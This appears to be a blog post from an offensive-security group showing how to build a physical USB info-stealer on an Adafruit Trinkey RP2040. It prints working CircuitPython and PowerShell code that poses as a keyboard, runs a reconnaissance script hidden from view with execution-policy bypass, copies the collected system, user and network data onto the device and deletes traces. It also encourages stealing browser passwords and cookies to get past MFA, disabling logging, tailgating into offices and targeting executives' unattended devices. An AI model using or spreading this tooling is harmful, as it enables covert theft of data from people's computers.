Home

Published

- 5 min read

How we would pwn you

Malware Development offensive security Pentesting Evasion RedTeam
img of How we would pwn you

Today, we create a physical Info-Stealer that is undetectable and leaves no traces.

How we would hack you?

In 2024 (and maybe beyond), everyone got one or the other way to avoid being hacked. Or at least, to detect it quickly, when they get hacked. Some use old flip-phones, others plug out the LAN cable entirely and consider themselfs secured. It’s true, owning someone these days is no longer that easy, when you try to use methods from 2003. Luckily, progress was made.

How to do physical attacks

Physical Attacks are nothing new, they have been used decades ago already, Stuxnet is the most popular example, back then it was a complex APT operation. Today, we got easy and cheap access to much nicer tools, we’re using the Adafruit Trinkey RP2040 which goes for about 10€ a piece. It combines the ability to run as storage (approx. 6MB usable after tax) and as HID (Human Interface Device == Keyboard, Mouse).

With a few quirks, it can do both.

How to detect malware

Pretty much all malware can be detected on the networking level, even Rootkits and other things that can manipulate the entire system into not-being-seen. Monitoring the data line though, that cannot be corrupted. That why, we don’t add persistence. We could, easily.

Instead we use the capability of the small device to:

  • Bring a script (demo.ps1)
  • Run an Info-Stealer
  • Exfill the collected information

code.py (excerpt)

CircuitPython

   def main():  
    command = """
del C:/windows/temp/sout.txt;
Start-Job -ScriptBlock { Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; using System.Threading; public class W { [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); [DllImport("user32.dll")] public static extern IntPtr GetForegroundWindow(); public static void D(int d) { Thread.Sleep(d); ShowWindow(GetForegroundWindow(), 6); } }'; [W]::D(5000); }
$v = (Get-Content -Force -Path F:/sd/demo.ps1) -join "`n";
Invoke-Expression $v | Out-File -FilePath C:/windows/temp/sout.txt -Force;
while (-not (Test-Path C:/windows/temp/sout.txt)) { Start-Sleep -Milliseconds 500 };
Copy-Item -Path C:/windows/temp/sout.txt -Destination F:/sd/ -Force;
del C:/windows/temp/sout.txt;
exit;
"""
    
    # We prepared some wrapper functions
    toggle_storage()
    run_ps(kbd, layout, command)

main()

Via HID keystrokes we open a Powershell Window using the Run-Dialog, add a line of delayed C# to hide the Info-Stealer window after we’re done “typing”. It works, pretty well!

Using the Run-Dialog

Note that both scripts are on demonstrational level right now, but fully functional. They succesfully extract infos in a few seconds, leaving no trace, not even on the Network Level.

Even if we were to keep it this lightweight and quick, we would at least try to steal Browser Passwords and maybe also Cookies to bypass MFA (Multifactor Authentication) - or run a larger script like our PrivATM in a slightly moddded version, an evaded Lazagne or other specialized tools, that efficiently grab infos.

HID Device typing Powershell commands

The upside of the current script is: It’s completely harmless, most security systems wouldn’t take note of these commands.

demo.ps1

Powershell

   systeminfo
tasklist
netstat -ano
whoami /all
net user
net localgroup
Get-NetAdapter
ipconfig /all
ipconfig /displaydns
route print
net share
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall" /s
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /s
Get-PSDrive -PSProvider FileSystem
query user
Get-ChildItem Env:
bcdedit
Get-ChildItem
Write-Output "Finished"

Full code examples on our GitHub

How to pass on

On other occassions we stored the script code in an Environment variable to pass it to different scopes:

CircuitPython
   $ $env:v=(Get-Content -ErrorAction SilentlyContinue -Force -Path F:/sd/demo.ps1) -join "`n"; 
$ & powershell -ExecutionPolicy Bypass -noprofile -Command "'$env:v' | IEX | Out-File c:/windows/temp/sout.txt; exit" ;

Little bonus technique.

How to apply the salve

The Trinkey is tiny, it can be finicky to program at first, you need to flash the Python Firmware and copy the right libs, but once you got the hang of it, it’s extremly simple to do the entire process. It’s a lot of fun and we always carry one or the other device in our pockets as EDC. In the last couple of years we tried on a few occassions to tailgate or simply enter a company building, without being invited, and it worked most of the time.

Adafruit Trinkey RP2040 is tiny

Nobody even lifted their head. It was only a little demo and training excercise, so we can share no details, except that we didn’t touch anything and left the building on the other side.

As employees today are nothing more than dead paperweight, exchangeable, manipulated, mindless, powerless slaves, busy backstabbing each other, who would care that we didn’t belong?

Other great opportunities are The Deutsche Bahn - first class is better, more vuln targets - company restaurants, cafes, walk-in shops. Herewith we confess that we’ve been sitting across high-level executives who left their devices on, open and logged in, while leaving their assigned seat, multiple times. Bad dog.

How to get caught

Of course, on larger corpo AD networks you need to expect USB Monitoring or even the USB ports being blocked entirely by policy - this is where our attack would be detected or fail. But on most worker machines, they need the USB ports for their custom Mousejiggler and highres webcam (guilty of both), chance are in your favour.

That’s how to Info Steal

for Beginners and Pros. Anyways, have fun Info Stealing, hope it brings you further in life.

Why not add an UAC Bypass and grab Wifi Creds next? Or turn off ScriptBlock-Logging, if you feel that’s helping your low-flight. We’re sure, HackTricks and 3 dozend other guides got you covered on building your ideal PhysicalInfoStealer, if not, steal the infos you need from Ducky-Scripts or simply ask your favourite AI troll.

We hope our article shows once again, that real hacking doesn’t mean, drowning in complexity. You don’t need to be able to read Opcodes backwards to succesfully pwn. While we’re truly humbled by one or the other pwn2own candidates, CTF pros and Security Researchers, everyday hacking has become easier than ever. Couple years ago we already built Digisparks that could connect to an (unlocked) Android, open the browser and trigger download & execution of a payload.

How to protect

If money isn’t too tight, we’d rather recommend up-to-date, executive level devices, which are fully pentested, receive regular security patches, etc. Everything can be hacked, old stuff even more so.

“May I have your phone for a second, I need to call my cat. It’s urgent and my battery died.”